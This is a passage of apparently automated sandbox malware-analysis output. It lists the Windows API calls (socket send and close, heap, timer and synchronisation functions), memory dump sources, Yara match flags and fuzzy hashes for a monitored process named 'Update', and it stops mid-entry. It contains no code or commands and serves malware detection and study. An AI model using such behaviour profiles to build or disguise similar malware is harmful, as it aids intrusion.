                                                                                                  • Part of subcall function 00C73F37: GetCurrentThreadId.KERNEL32 ref: 00C73F3C
                                                                                                  • Part of subcall function 00C73F37: send.WS2_32(?,10017440,00000010,00000000), ref: 00C73F9D
                                                                                                  • Part of subcall function 00C73F37: SetEvent.KERNEL32(?), ref: 00C73FC0
                                                                                                  • Part of subcall function 00C73F37: InterlockedExchange.KERNEL32(?,00000000), ref: 00C73FCC
                                                                                                  • Part of subcall function 00C73F37: WSACloseEvent.WS2_32(?), ref: 00C73FDA
                                                                                                  • Part of subcall function 00C73F37: shutdown.WS2_32(?,00000001), ref: 00C73FF2
                                                                                                  • Part of subcall function 00C73F37: closesocket.WS2_32(?), ref: 00C73FFC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_c70000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                • String ID:
                                                                                                • API String ID: 4080316033-0
                                                                                                • Opcode ID: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                                                • Instruction ID: 471651b13fbf0c551cd5c52432290080bfc15ca4626c413b6259706e2eeaefc2
                                                                                                • Opcode Fuzzy Hash: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                                                • Instruction Fuzzy Hash: 3B218F76600704ABD220EFB9DC85B9BB3E8FF89711F004A0EF58AC7650D671E904DBA0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrlen$_memset
                                                                                                • String ID:
                                                                                                • API String ID: 2425037729-0
                                                                                                • Opcode ID: 47eb5098d38fea4605040deaf1b9982e4a30916585e1a48116445b0cab4b7407
                                                                                                • Instruction ID: b9f2a4b918652bce4ebdc25e58d41785eda547da32999051e3e36158b74179cd
                                                                                                • Opcode Fuzzy Hash: 47eb5098d38fea4605040deaf1b9982e4a30916585e1a48116445b0cab4b7407
                                                                                                • Instruction Fuzzy Hash: 1121D87670021DAFCB14DF58DC809BEB3A9FBC4720B69416DEE05C7301F731995186A2
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAAA751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CAAD550,?,00000000,-00000008), ref: 6CAAA7B2
                                                                                                • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6CAAF6C9
                                                                                                • __dosmaperr.LIBCMT ref: 6CAAF6D0
                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6CAAF70A
                                                                                                • __dosmaperr.LIBCMT ref: 6CAAF711
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 978514ca931513d51d5c47d1724847cefa48fc53c282eced93acba4f6b92bb72
                                                                                                • Instruction ID: 3a2ebfe86283da325a354c7cbbcb0a62cea39a5aa90c95cd4e35453c78f3ea6e
                                                                                                • Opcode Fuzzy Hash: 978514ca931513d51d5c47d1724847cefa48fc53c282eced93acba4f6b92bb72
                                                                                                • Instruction Fuzzy Hash: 0921B371604245AF9B189FE6CD8099AB7B9FF053A8704861DF918D7E10E730ECD68B90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89b472cd2c433b4fa2df36061b9e77c377b733b3a9bc7c13444644078893256b
                                                                                                • Instruction ID: 4c6920384596c0b53d288c4519dc7bde068fef68b1fdbff59b08c8343ad0ad24
                                                                                                • Opcode Fuzzy Hash: 89b472cd2c433b4fa2df36061b9e77c377b733b3a9bc7c13444644078893256b
                                                                                                • Instruction Fuzzy Hash: 6C21CD32214216BF8B009FA68D8598B77E9EF05328718871DF919C7A00EB30EDE5C7A0
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6CAB0C90
                                                                                                  • Part of subcall function 6CAAA751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CAAD550,?,00000000,-00000008), ref: 6CAAA7B2
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CAB0CC8
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CAB0CE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: 7a232bb95051820df6dad08c0317d0cbf7580292233fc0e2176280392e57c949
                                                                                                • Instruction ID: e63edeb7430cce1428a0ce88283705681ceb84d435949d684b6d96acc9d3f8e4
                                                                                                • Opcode Fuzzy Hash: 7a232bb95051820df6dad08c0317d0cbf7580292233fc0e2176280392e57c949
                                                                                                • Instruction Fuzzy Hash: 8A11E1F260165A7E670117B68E8CCEF7AADCF4A29D3144114F901E2640FF70EECA8A71
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,-00000A64,?,00000000,?,6CA90BAE,?), ref: 6CA907C6
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?), ref: 6CA90803
                                                                                                • WideCharToMultiByte.KERNEL32 ref: 6CA90833
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 6CA90862
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 626452242-0
                                                                                                • Opcode ID: 803d9d786172295d20d1efbf2ce021a01a1280ca0a8468f329ec7d7d97464b65
                                                                                                • Instruction ID: f588e4267de550f8009074ded4d493f944dd8e8ae6312983639764fd870d4bfb
                                                                                                • Opcode Fuzzy Hash: 803d9d786172295d20d1efbf2ce021a01a1280ca0a8468f329ec7d7d97464b65
                                                                                                • Instruction Fuzzy Hash: 57115E71B043053BF7105B719C0AF5B7AECDB82778F104315F6289A2D0EB71694C86A2
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F), ref: 037F43EC
                                                                                                  • Part of subcall function 037F13A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 037F13CB
                                                                                                  • Part of subcall function 037F41E0: EnterCriticalSection.KERNEL32(037F4FB5,037F4E55,037F42BE,00000000,?,?,037F4E55,?,?,?,?,00000000,000000FF), ref: 037F41E8
                                                                                                  • Part of subcall function 037F41E0: LeaveCriticalSection.KERNEL32(037F4FB5,?,?,?,00000000,000000FF), ref: 037F41F6
                                                                                                  • Part of subcall function 037F4C70: HeapFree.KERNEL32(?,00000000,?,00000000,037F4E55,?,037F42C8,037F4E55,00000000,?,?,037F4E55,?), ref: 037F4C97
                                                                                                • SetLastError.KERNEL32(00000000,?), ref: 037F43D7
                                                                                                • SetLastError.KERNEL32(00000057), ref: 037F4401
                                                                                                • WSAGetLastError.WS2_32(?), ref: 037F4410
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                • String ID:
                                                                                                • API String ID: 2060118545-0
                                                                                                • Opcode ID: 60eea161baedb74cb494c71cc3d51cf330b68868eb1e064c5ce8add9b349c51f
                                                                                                • Instruction ID: d313225225fbdd62550c589539f6c362c333c8e636090810de831d037c619cb3
                                                                                                • Opcode Fuzzy Hash: 60eea161baedb74cb494c71cc3d51cf330b68868eb1e064c5ce8add9b349c51f
                                                                                                • Instruction Fuzzy Hash: 7611A33AA055189BCB10EE7AF88459FF7A8FF88232B4805AAED0CE7300D735990186D1
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F), ref: 100043EC
                                                                                                  • Part of subcall function 100013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 100013CB
                                                                                                  • Part of subcall function 10004C50: HeapFree.KERNEL32(?,00000000,?,00000000,10004E35,?,100042C8,10004E35,00000000,?,00000001,10004E35,?), ref: 10004C77
                                                                                                • SetLastError.KERNEL32(00000000,?), ref: 100043D7
                                                                                                • SetLastError.KERNEL32(00000057), ref: 10004401
                                                                                                • WSAGetLastError.WS2_32(?), ref: 10004410
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocFree
                                                                                                • String ID:
                                                                                                • API String ID: 1906775185-0
                                                                                                • Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                                                • Instruction ID: af902972c3ae3a33560ac4961c645c5895ff77c926fb996934c7b8e77325769a
                                                                                                • Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                                                • Instruction Fuzzy Hash: CA11CA76B055289BE700DFA9E8845DEB7A8EF883B2B0541B6FD0CD7204DA35DD0546D4
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 037FDE93
                                                                                                • _free.LIBCMT ref: 037FDED5
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,037FDC95), ref: 037FDEFC
                                                                                                • HeapFree.KERNEL32(00000000), ref: 037FDF03
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap_free$FreeProcess
                                                                                                • String ID:
                                                                                                • API String ID: 1072109031-0
                                                                                                • Opcode ID: f09a0a12489992da6b6395a83573dc4b826148d6b67936c1562925509313e391
                                                                                                • Instruction ID: 606d150d2127e7910ef54d575bcbf0930f5b85bde66b41a51ae987c4f91c2f62
                                                                                                • Opcode Fuzzy Hash: f09a0a12489992da6b6395a83573dc4b826148d6b67936c1562925509313e391
                                                                                                • Instruction Fuzzy Hash: EA114675600B009FD630DB64CC49B67B3AABB84710F18891CE69A87B84DB74F842CB91
                                                                                                APIs
                                                                                                • WSAEventSelect.WS2_32(?,037F3ABB,00000023), ref: 037F3C02
                                                                                                • WSAGetLastError.WS2_32 ref: 037F3C0D
                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 037F3C58
                                                                                                • WSAGetLastError.WS2_32 ref: 037F3C63
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EventSelectsend
                                                                                                • String ID:
                                                                                                • API String ID: 259408233-0
                                                                                                • Opcode ID: ea3a159da2137ada289b0ce88db47120ba95ae45a4e870751b66305fc086e7c2
                                                                                                • Instruction ID: dbe032c2e3bc3dc14277beae91b94e15afbf40252d4648c4dbee71d53c843550
                                                                                                • Opcode Fuzzy Hash: ea3a159da2137ada289b0ce88db47120ba95ae45a4e870751b66305fc086e7c2
                                                                                                • Instruction Fuzzy Hash: A4115ABA610B009FE720DF79E888A57B6EDBBC8724F110A6DE666C7790D731E400CB50
                                                                                                APIs
                                                                                                • WSAEventSelect.WS2_32(10003ABB,00000001,00000023), ref: 10003C02
                                                                                                • WSAGetLastError.WS2_32 ref: 10003C0D
                                                                                                • send.WS2_32(00000001,00000000,00000000,00000000), ref: 10003C58
                                                                                                • WSAGetLastError.WS2_32 ref: 10003C63
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EventSelectsend
                                                                                                • String ID:
                                                                                                • API String ID: 259408233-0
                                                                                                • Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                                                • Instruction ID: 2cb4a202ed201c3bbb9feb76d4ba786ae7603a0bc4fad51836a507335b835d1f
                                                                                                • Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                                                • Instruction Fuzzy Hash: 19116AB6600710ABE320CB79C8C8A47B7E9FB88750B014A2DE956C7690C732E8008B50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                • Instruction ID: 4a49ecca680f2e28a4ac268f39e1e793a8abdd88217117836e4ac9e20ee24e7a
                                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                • Instruction Fuzzy Hash: 1B114C7600014EBBCF579EC8CC16CEE3F67BB18654B588495FA28991B0C736C9B1AB91
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                • Instruction ID: 466f4f1e7ae25f0961f396d3557a49c78803b8d6a6677ae74fd306ec2772594f
                                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                • Instruction Fuzzy Hash: 08114E3640018AFBDF129E84CC41CEE3F62FB083A4B558419FE6859439C336DAB1BB81
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(037F4FB5,037F4E55,037F42BE,00000000,?,?,037F4E55,?,?,?,?,00000000,000000FF), ref: 037F41E8
                                                                                                • LeaveCriticalSection.KERNEL32(037F4FB5,?,?,?,00000000,000000FF), ref: 037F41F6
                                                                                                • LeaveCriticalSection.KERNEL32(037F4FB5), ref: 037F4257
                                                                                                • SetEvent.KERNEL32(8520468B), ref: 037F4272
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                • String ID:
                                                                                                • API String ID: 3394196147-0
                                                                                                • Opcode ID: df976a2efb607993c0e328ca0c62afbd706ad8012591192cca994208acad4d8b
                                                                                                • Instruction ID: 40c1d8544f8c66c1b36c90e10fa1e69945a481918f3e7e5acb39638b0934c074
                                                                                                • Opcode Fuzzy Hash: df976a2efb607993c0e328ca0c62afbd706ad8012591192cca994208acad4d8b
                                                                                                • Instruction Fuzzy Hash: 771103B0601B059FD724CF79D588A97FBE9FF48300B15896DE56E87211EB31E801CB00
                                                                                                APIs
                                                                                                • timeGetTime.WINMM(00000001,?,00000001,?,037F3C4F,?,?,00000001), ref: 037F4B15
                                                                                                • InterlockedIncrement.KERNEL32(00000001), ref: 037F4B24
                                                                                                • InterlockedIncrement.KERNEL32(00000001), ref: 037F4B31
                                                                                                • timeGetTime.WINMM(?,037F3C4F,?,?,00000001), ref: 037F4B48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlockedTimetime
                                                                                                • String ID:
                                                                                                • API String ID: 159728177-0
                                                                                                • Opcode ID: fba20ed9d22a888a11fe15228172af58016cf689d941305767e0a1e5a56f3363
                                                                                                • Instruction ID: 743927f5b7ee0bb9ec31b24a3d20666b33143d55db564b628012e8337fd023dc
                                                                                                • Opcode Fuzzy Hash: fba20ed9d22a888a11fe15228172af58016cf689d941305767e0a1e5a56f3363
                                                                                                • Instruction Fuzzy Hash: F801C8B56007059FC720EFBAD88098AFBECBF58650700892AE549C7710E774E5448FA0
                                                                                                APIs
                                                                                                • timeGetTime.WINMM(00000001,?,00000001,?,10003C4F,?,?,00000001), ref: 10004AF5
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 10004B04
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 10004B11
                                                                                                • timeGetTime.WINMM(?,00000001,?,10003C4F,?,?,00000001), ref: 10004B28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlockedTimetime
                                                                                                • String ID:
                                                                                                • API String ID: 159728177-0
                                                                                                • Opcode ID: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
                                                                                                • Instruction ID: 0a1d15bd5f988d4bea10877f224db5579cb700bf5039280ae9249a62ae1a06e8
                                                                                                • Opcode Fuzzy Hash: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
                                                                                                • Instruction Fuzzy Hash: E20116B5601705AFD720DFBAC88098AFBF9EF4C650701892EE549CB611E771EA448FE0
                                                                                                APIs
                                                                                                • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 037F3667
                                                                                                • _free.LIBCMT ref: 037F369C
                                                                                                  • Part of subcall function 037FF639: RtlFreeHeap.NTDLL(00000000,00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D), ref: 037FF64F
                                                                                                  • Part of subcall function 037FF639: GetLastError.KERNEL32(00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340), ref: 037FF661
                                                                                                • _malloc.LIBCMT ref: 037F36D7
                                                                                                • _memset.LIBCMT ref: 037F36E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                • String ID:
                                                                                                • API String ID: 3340475617-0
                                                                                                • Opcode ID: acfb7257c80da7d5c59e30a83a84d273d677f606fd9ea5a0ecdc4dcd33c0f3dc
                                                                                                • Instruction ID: 2478962aa40d47b1207c2e41da064dc5994b150ae64274c40ac5dbf5bd21aab4
                                                                                                • Opcode Fuzzy Hash: acfb7257c80da7d5c59e30a83a84d273d677f606fd9ea5a0ecdc4dcd33c0f3dc
                                                                                                • Instruction Fuzzy Hash: 7501D6F5900B04DFE360DF7A9885B97BBE9FB85214F14482EE5AE87301DA31A8458F20
                                                                                                APIs
                                                                                                • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
                                                                                                • _free.LIBCMT ref: 1000369C
                                                                                                  • Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
                                                                                                  • Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71
                                                                                                • _malloc.LIBCMT ref: 100036D7
                                                                                                • _memset.LIBCMT ref: 100036E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                • String ID:
                                                                                                • API String ID: 3340475617-0
                                                                                                • Opcode ID: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
                                                                                                • Instruction ID: 20f9dc9dccf48a4f32705b4407c0702e844904f7cd1830b54ea69625ce22a711
                                                                                                • Opcode Fuzzy Hash: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
